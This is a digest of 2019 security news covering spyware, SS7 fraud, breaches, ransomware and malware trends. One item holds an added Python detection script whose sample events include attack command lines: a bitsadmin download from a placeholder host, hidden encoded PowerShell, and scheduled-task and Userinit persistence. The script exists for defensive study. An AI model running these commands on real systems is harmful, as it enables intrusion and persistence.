Grandstream and Sikur partner to offer secure business communications

By: TI Inside Online

Grandstream, a SIP unified communications solutions company, and Sikur announced on Thursday the 7th the interoperability of their voice and video solutions, combining both so that a company of any size can easily build a secure real-time collaboration solution using state-of-the-art hardware and software.

The partnership between Grandstream and Sikur creates a new way for companies to collaborate and keep their critical information secure and private. The SIKURPlatform application will be available for download directly from the GS-Market app on any of Grandstream's Android-based devices, including the GVC series of video conferencing devices, the GXV series of Android IP video phones and the GAC2500 IP conference phone. As a result, users can make encrypted voice and video calls, use encrypted chat and messaging, and even share documents through the SIKURPlatform application in a secure environment without leaving their Grandstream devices.

“The power of our GXV video conferencing and business conferencing solutions, combined with the Sikur software, will open up possibilities to improve the security and privacy of collaboration within organizations,” said Jorge Otero, CALA sales director at Grandstream. “This partnership strengthens Grandstream's vision of providing the right solution for every type of user, and now executives who want a secure exchange of voice, video and data through the SIKUR platform can do so directly from their desk without the need for any additional device.”

More: http://tiinside.com.br/tiinside/07/02/2019/grandstream-e-sikur-fazem-parceria-para-oferecer-comunicacoes-comerciais-seguras/?noticiario=TI

What’s Farsi for ‘as subtle as a nuke through a window’? Foreign diplomats in Iran hit by renewed Remexi nasty

Iran, spying on foreigners within its borders? Shocked, shocked, we tell you

By: Shaun Nichols

A newly uncovered spyware-slinging operation appears to have been targeting foreign diplomats in Iran for more than three years.

Researchers at Kaspersky Lab said this week that a new build of the Remexi software nasty, first seen in 2015, has been spotted lurking on multiple machines within Iran, mostly those located within what we assume are foreign embassy buildings. The Windows-targeting surveillance-ware was previously associated with a hacking group known as Chafer, and an examination of the latest strain suggests it is of Iranian origin.

“The malware can exfiltrate keystrokes, screenshots, browser-related data like cookies and history, decrypted when possible,” Kaspersky’s Denis Legezo said of the infection.

“The attackers rely heavily on Microsoft technologies on both the client and server sides: the Trojan uses standard Windows utilities like Microsoft Background Intelligent Transfer Service (BITS) bitsadmin.exe to receive commands and exfiltrate data.”

Curiously, Legezo said he does not yet know how the malware is spreading in the wild, just that it is targeting “foreign diplomatic entities” based within Iran.

“So far, our telemetry hasn’t provided any concrete evidence that shows us how the Remexi malware spread,” we’re told.

“However, we think it’s worth mentioning that for one victim we found a correlation between the execution of Remexi’s main module and the execution of an AutoIt script compiled as PE, which we believe may have dropped the malware.”

Once on a victim’s machine, the spyware is very persistent, hiding out in scheduled tasks, Userinit and Run registry keys in the HKLM hive, depending on the version of Windows it has infected. Data is exfiltrated to command and control servers using Microsoft’s bitsadmin.exe transfer utility.

According to timestamps in the malware, its development appears to have been completed in March 2018, though there are a few sections of the code that appear to be much older.

More:  https://www.theregister.co.uk/2019/01/31/iran_embassies_malware/

SS7 exploited to intercept 2FA bank confirmation codes to raid accounts

By: Robert Abel

Cybercriminals are exploiting flaws in SS7, a protocol used by telecom companies to coordinate how they route texts and calls around the world, to empty bank accounts by intercepting messages sent for two-factor authentication (2FA).

The exploit can allow threat actors to track phones across the planet and intercept text messages and phone calls without hacking the phone itself.

While it was already known that intelligence agencies and surveillance contractors could carry out these kinds of attacks, Motherboard reported confirmation that financially motivated criminal organizations used the technique to empty accounts at the U.K.’s Metro Bank in a recent attack.

“At Metro Bank we take our customers’ security extremely seriously and have a comprehensive range of safeguards in place to help protect them against fraud,” a Metro Bank spokesperson told Motherboard in an email. “We have supported telecommunication companies and law enforcement authorities with an industry-wide investigation and understand that steps have been taken to resolve the issue.”

Customers at other banks have also been victims of these attacks and the spokesperson went on to say that those affected at their bank represent only a small percentage of those affected.

The attacks highlight the underlying issue that the SS7 network does not authenticate who sends requests, so SS7 treats the commands of whoever gains access to the network the same, regardless of their validity.

More: https://www.scmagazine.com/home/security-news/cybercriminals

Potential global cyber attack could cause $85 billion-$193 billion worth of damage: report

By: Noor Zainab Hussain, Tanishaa Nadkar

(Reuters) – A co-ordinated global cyber attack, spread through malicious email, could cause economic damages anywhere between $85 billion and $193 billion, a hypothetical scenario developed as a stress test for risk management showed.

Insurance claims after such an attack would range from business interruption and cyber extortion to incident response costs, the report jointly produced by insurance market Lloyd’s of London and Aon said on Tuesday.

Total claims paid by the insurance sector in this scenario are estimated at between $10 billion and $27 billion, based on policy limits ranging from $500,000 to $200 million.

The stark difference between insured and economic loss estimates highlights the extent of underinsurance, in case of such an attack, the stress test showed. An attack could affect several sectors globally, with the largest losses in retail, healthcare, manufacturing and banking fields.

Regional economies that are more service dominated, especially the United States and Europe, would suffer more and are vulnerable to higher direct losses, the report said.

Cyber attacks have been in focus after a virus spread from Ukraine to wreak havoc around the globe in 2017, crippling thousands of computers, disrupting ports from Mumbai to Los Angeles and even halting production at a chocolate factory in Australia.

Governments are increasingly warning against the risks private businesses face from such attacks, both those carried out by foreign governments and financially motivated criminals.

More: https://www.reuters.com/article/us-wirecard-stocks/wirecard-denies-ft-report-alleging-financial-wrongdoing-idUSKCN1PO25C

Vale hacked; leaked documents show how the company handles accidents

By: Felipe Payão

The Brazilian multinational mining company Vale was breached, and supposedly confidential internal documents were taken and leaked by the intruders. The hackers reportedly took advantage of an open door in Microsoft SharePoint, a team collaboration software tool, to retrieve meeting minutes and extract records of security incidents and occurrences from around the world.

TecMundo received the documents on Tuesday (29) from an anonymous source. There are about 40,000 files in a 500 MB folder. In them one can find security incidents that took place between 2017 and 2019 at Vale sites in Brazil, Canada, Mozambique, New Caledonia and Indonesia.

“One of the documents reports an armed robbery at a pipeline, and there was no record of a subsequent police report,” the source stated in the email in which the documents were sent. TecMundo found the specific document cited, but not the matter of the police report mentioned.

Vale was contacted about the incident but had not offered any response by the time this article was published (update: after publication, the company sent a statement, which you can read below). For their part, the hackers did not detail how the company was breached, noting only that the documents were extracted through a gap in a hidden URL that was open to the public: “Indexing of secret documents on a hidden subdomain, through search engines,” they noted.

More: https://www.tecmundo.com.br/seguranca/138314-vale-hackeada-documentos-mostram-empresa-lida-acidentes.htm?f&utm_source=facebook.com&utm_medium=referral&utm_campaign=thumb

GandCrab ransomware and Ursnif virus spreading via MS Word macros

By: Swati Khandelwal

Security researchers have discovered two separate malware campaigns, one of which is distributing the Ursnif data-stealing trojan and the GandCrab ransomware in the wild, whereas the second one is only infecting victims with Ursnif malware.

Though both malware campaigns appear to be the work of two separate cybercriminal groups, they share many similarities. Both attacks start with phishing emails containing an attached Microsoft Word document embedded with malicious macros, and then use PowerShell to deliver fileless malware.

Ursnif is a data-stealing malware that typically steals sensitive information from compromised computers with an ability to harvest banking credentials, browsing activities, collect keystrokes, system and process information, and deploy additional backdoors.

Discovered early last year, GandCrab is a widespread ransomware threat that, like every other ransomware in the market, encrypts files on an infected system and demands that victims pay a ransom in digital currency to unlock them. Its developers ask for payment primarily in DASH, which is harder to track.

MS Docs + VBS macros = Ursnif and GandCrab Infection

The first malware campaign distributing two malware threats was discovered by security researchers at Carbon Black who located approximately 180 variants of MS Word documents in the wild that target users with malicious VBS macros.

If successfully executed, the malicious VBS macro runs a PowerShell script, which then uses a series of techniques to download and execute both Ursnif and GandCrab on the targeted systems.
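Two of the stories in this digest describe behaviours a defender can look for in endpoint telemetry: Remexi persisting through the Userinit and Run keys in HKLM and scheduled tasks and moving data with bitsadmin.exe (the Kaspersky report above), and the Ursnif/GandCrab campaigns launching PowerShell from a Word macro (the Carbon Black findings). The script below is an added example written for this page, not code from Kaspersky, Carbon Black or any of the vendors mentioned; it runs four simple rules over a handful of constructed, Sysmon-like JSON events. The event field names (`type`, `image`, `parent`, `cmdline`, `target`), the allowlist of processes permitted to write autostart keys, and every path and URL in the sample are assumptions made up for the example.

```python
import json
import re
from dataclasses import dataclass

# Constructed sample telemetry in a simplified Sysmon-like JSON-lines shape.
# These are not real logs: every path, host name and URL below is made up.
SAMPLE_EVENTS = [
    r'{"type":"process","image":"C:\\Windows\\System32\\svchost.exe","parent":"C:\\Windows\\System32\\services.exe","cmdline":"svchost.exe -k netsvcs"}',
    r'{"type":"process","image":"C:\\Program Files\\Microsoft Office\\WINWORD.EXE","parent":"C:\\Windows\\explorer.exe","cmdline":"WINWORD.EXE /n invoice.doc"}',
    r'{"type":"process","image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","parent":"C:\\Program Files\\Microsoft Office\\WINWORD.EXE","cmdline":"powershell.exe -NoProfile -WindowStyle Hidden -EncodedCommand AAAA"}',
    r'{"type":"process","image":"C:\\Windows\\System32\\bitsadmin.exe","parent":"C:\\Windows\\System32\\cmd.exe","cmdline":"bitsadmin.exe /transfer job1 /download /priority high http://example.invalid/u.bin C:\\Users\\Public\\u.bin"}',
    r'{"type":"registry","image":"C:\\Users\\Public\\u.bin","target":"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Userinit","value":"C:\\Windows\\system32\\userinit.exe,C:\\Users\\Public\\u.bin"}',
    r'{"type":"registry","image":"C:\\Windows\\System32\\msiexec.exe","target":"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\VendorAgent","value":"C:\\Program Files\\Vendor\\agent.exe"}',
    r'{"type":"process","image":"C:\\Windows\\System32\\schtasks.exe","parent":"C:\\Windows\\System32\\cmd.exe","cmdline":"schtasks.exe /create /sc minute /mo 15 /tn Updater /tr C:\\Users\\Public\\u.bin"}',
]

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"powershell.exe", "wscript.exe", "cscript.exe", "cmd.exe", "mshta.exe"}
# Assumption for this example: only the Windows Installer legitimately writes
# autostart keys in the monitored environment. Tune this to your own baseline.
AUTOSTART_WRITERS_ALLOWED = {"msiexec.exe"}
# Winlogon\Userinit and the HKLM Run/RunOnce keys named in the Remexi report.
AUTOSTART_KEY = re.compile(r"\\(winlogon\\userinit$|currentversion\\run(once)?(\\|$))", re.IGNORECASE)


@dataclass
class Finding:
    rule: str
    event_index: int
    detail: str


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path, so comparisons ignore directory and case."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def check_process(ev: dict, idx: int) -> list:
    image = basename(ev.get("image", ""))
    parent = basename(ev.get("parent", ""))
    cmd = ev.get("cmdline", "")
    out = []
    # Word/Excel/PowerPoint spawning a script host is the macro-to-PowerShell chain.
    if parent in OFFICE_APPS and image in SCRIPT_HOSTS:
        out.append(Finding("office_spawned_script_host", idx, f"{parent} -> {image}"))
    # Command-line BITS jobs are how Remexi fetched tasking and pushed data out.
    if image == "bitsadmin.exe" and re.search(r"/(transfer|addfile)\b", cmd, re.IGNORECASE):
        out.append(Finding("bits_cli_transfer", idx, cmd))
    # Scheduled-task creation from the command line: the other persistence path named above.
    if image == "schtasks.exe" and re.search(r"/create\b", cmd, re.IGNORECASE):
        out.append(Finding("schtasks_create", idx, cmd))
    return out


def check_registry(ev: dict, idx: int) -> list:
    image = basename(ev.get("image", ""))
    target = ev.get("target", "")
    if AUTOSTART_KEY.search(target) and image not in AUTOSTART_WRITERS_ALLOWED:
        return [Finding("autostart_registry_write", idx, f"{image} wrote {target}")]
    return []


def analyze(lines) -> list:
    """Run all rules over JSON-lines events; malformed lines are skipped, not fatal."""
    findings = []
    for idx, line in enumerate(lines):
        try:
            ev = json.loads(line)
        except json.JSONDecodeError:
            continue
        if ev.get("type") == "process":
            findings.extend(check_process(ev, idx))
        elif ev.get("type") == "registry":
            findings.extend(check_registry(ev, idx))
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f"[{f.rule}] event #{f.event_index}: {f.detail}")
```

On the constructed sample the benign svchost, Word and msiexec events pass silently and the four suspicious ones are flagged: the Word-spawned PowerShell, the bitsadmin transfer, the Userinit write by an unknown binary, and the schtasks creation. Each rule on its own is noisy in a real fleet (administrators use bitsadmin and schtasks too), so in practice these findings are scored together per host rather than alerted on individually.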

More: https://thehackernews.com/2019/01/microsoft-gandcrab-ursnif.html

Unprotected VOIP Server Exposed Millions of SMS Messages, Call Logs

By: Mohit Kumar

A California-based Voice-Over-IP (VoIP) services provider VOIPO has accidentally left tens of gigabytes of its customer data, containing millions of call logs, SMS/MMS messages, and plaintext internal system credentials, publicly accessible to anyone without authentication.

VOIPo is one of the leading providers of Voice-Over-IP (VoIP) services in the United States, offering reseller VoIP, cloud VoIP, and VoIP services to residential customers and small businesses.

Justin Paine, head of Trust & Safety at Cloudflare, discovered the open ElasticSearch database last week using the Shodan search engine and notified VOIPo’s CTO, who promptly secured the database, which contained at least four years of data on its customers.

According to Paine, the database contained 6.7 million call logs dating back to July 2017, 6 million SMS/MMS logs dating back to December 2015, and 1 million logs containing API keys for internal systems.

While the call logs included timestamp and duration of VOIPO customers’ VOIP calls and partial originating and destination phone numbers of those calls, the SMS and MMS logs even included the full content of messages.

Besides this, the unprotected database also stored 1 million logs containing references to internal hostnames, some of which also included plaintext usernames and passwords for those systems. These sensitive values were exposed since June 3, 2018.

More: https://thehackernews.com/2019/01/voip-service-database-hacking.html?fbclid=IwAR3MUyHbfv8Ck5QBrrxXi-Bci8vQiRZWGI8v1YxdPIjuQnZACpC4QEUfx-Y&&m=1

City of Del Rio Hit by Ransomware Attack

By: Kacy Zurkus

Another ransomware attack has made headlines with the city of Del Rio, Texas, announcing on January 10, 2019, that the servers at City Hall were disabled, according to a press release.

“The first step in addressing the issue was for the City’s M.I.S. (Management Information Services) Department to isolate the ransomware, which necessitated turning off the internet connection for all city departments and not allowing employees to log into the system. Due to this, transactions at City Hall are being done manually with paper.”

As has been the alternative method of communication for many organizations that have been impacted by cyber-attacks, Del Rio turned to social media, using Facebook to inform citizens of alternative payment options available to them.

After reporting the attack to the FBI, Del Rio was referred to the Secret Service. “The City is diligently working on finding the best solution to resolve this situation and restore the system. We ask the public to be patient with us as we may be slower in processing requests at this time,” the press release said.

More: https://www.infosecurity-magazine.com/news/city-of-del-rio-hit-by-ransomware/

Crypto-Mining, Banking Trojans Top Malware Threats

By: Kacy Zurkus

Crypto-mining malware has again topped the threat index, with Coinhive holding strong in the number one malware threat for the 13th consecutive month, according to the latest Global Threat Index for December 2018, published by Check Point.

The threat index looks at the most common active malware variants and trends as cyber criminals evolve toward crypto-mining and multipurpose malware.

A second-stage downloader, SmokeLoader, first identified back in 2011, jumped to ninth place on the December top-10 list. “After a surge of activity in the Ukraine and Japan, its global impact grew by 20. SmokeLoader is mainly used to load other malware, such as Trickbot Banker, AZORult Infostealer and Panda Banker,” according to a press release.

“December’s report saw SmokeLoader appearing in the top 10 for the first time. Its sudden surge in prevalence reinforces the growing trend towards damaging, multipurpose malware in the Global Threat Index, with the top 10 divided equally between crypto-miners and malware that uses multiple methods to distribute numerous threats,” said Maya Horowitz, threat intelligence and research group manager at Check Point.

“The diversity of the malware in the Index means that it is critical that enterprises employ a multilayered cybersecurity strategy that protects against both established malware families and brand new threats.”

More:  https://www.infosecurity-magazine.com/news/crypto-mining-banking-trojans-top/